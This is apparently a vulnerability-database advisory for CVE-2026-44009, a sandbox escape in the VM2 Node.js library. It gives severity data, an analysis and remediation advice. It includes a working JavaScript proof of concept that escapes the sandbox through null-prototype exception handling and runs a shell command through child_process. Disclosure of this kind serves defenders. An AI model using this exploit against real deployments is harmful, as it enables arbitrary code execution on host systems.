VM2 CVE-2026-44009
CRITICALSeverity by source
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Primary rating from Vendor (https://github.com/patriksimek/vm2).
CVSS VectorVendor: https://github.com/patriksimek/vm2
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Lifecycle Timeline
3Blast Radius
ecosystem impact- 8 npm packages depend on vm2 (3 direct, 5 indirect)
Ecosystem-wide dependent count for version 3.11.2.
DescriptionCVE.org
Summary
VM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system.
Details
In handleException due to `// SECURITY (post-GHSA-mpf8 hardening): use from (not ensureThis) exceptions with a null proto will be assumed to come from the other side and being proxied. Therefore, it is possible to get the proxied and unproxied object of a sandbox object with a null proto when thrown and then catched which allows to get the host Function` object.
PoC
const {VM} = require("vm2");
const vm = new VM();
console.log(vm.run(`
const o = {__proto__: null};
try {
throw o;
} catch (e) {
e.f = Buffer.prototype.inspect
o.f.constructor("return process")().mainModule.require('child_process').execSync('touch pwned');
}
`));Impact
Attackers can perform Remote Code Execution under the assumption that arbitrary code can be executed inside the context of a vm2 sandbox.
AnalysisAI
Remote code execution in VM2 (npm package) allows complete sandbox escape via null-prototype exception handling flaw. Attackers can execute arbitrary system commands on the host by exploiting a logic error in the exception proxy mechanism that incorrectly handles objects with null prototypes. Public exploit code exists and the vulnerability affects all versions prior to 3.11.2. The CVSS 9.8 severity reflects network-accessible, unauthenticated exploitation requiring no user interaction - however, real-world risk depends on whether untrusted users can supply code to the VM2 sandbox in a given deployment.
Technical ContextAI
VM2 is a popular Node.js sandbox library (npm package) designed to execute untrusted JavaScript code in an isolated environment. The vulnerability (CWE-668: Exposure of Resource to Wrong Sphere) exists in the exception handling bridge between the sandbox and host realms. When VM2's handleException function processes exceptions, it uses a heuristic to distinguish sandbox objects from host objects based on prototype chains. The post-GHSA-mpf8 hardening code specifically checks prototypes to decide whether to proxy an exception. However, objects with explicitly null prototypes (__proto__: null) confuse this logic - the exception handler incorrectly treats them as host-realm objects requiring proxying. When such an object is thrown from the sandbox and caught, the attacker receives both the proxied and unproxied references. By manipulating properties on these dual references, attackers can access the host's Function constructor through Buffer.prototype.inspect.constructor, then invoke process.mainModule.require to load child_process and execute arbitrary shell commands. This breaks the fundamental security boundary that VM2 is designed to enforce.
RemediationAI
Upgrade to VM2 version 3.11.2 immediately, as confirmed by the release notes at https://github.com/patriksimek/vm2/releases/tag/v3.11.2. This version patches three critical RCE vulnerabilities including GHSA-9vg3-4rfj-wgcm. Update via npm with 'npm install vm2@3.11.2' or 'npm update vm2' if package.json allows. If immediate patching is impossible, disable or restrict access to any application features that allow untrusted users to submit code for VM2 execution - this is the only effective workaround since the vulnerability is in the core sandbox mechanism. Specifically, implement authentication and authorization controls to limit code execution endpoints to trusted users only, though this reduces the utility of the sandbox. Consider replacing VM2 with alternative sandboxing solutions (isolated-vm, Worker threads with limited capabilities) as VM2 has a history of sandbox escape vulnerabilities and the project's security model may be fundamentally flawed. Review application logs for suspicious child_process executions or file system modifications (e.g., unexpected file creation) that could indicate prior exploitation. Note that version 3.11.2 fixes multiple RCE issues simultaneously, suggesting thorough security review was conducted - however, given the pattern of bypasses, defense-in-depth is essential even after patching.
Same weakness CWE-668 – Exposure of Resource to Wrong Sphere
View allSame technique Information Disclosure
View allVendor StatusVendor
Share
External POC / Exploit Code
Leaving vuln.today
GHSA-9vg3-4rfj-wgcm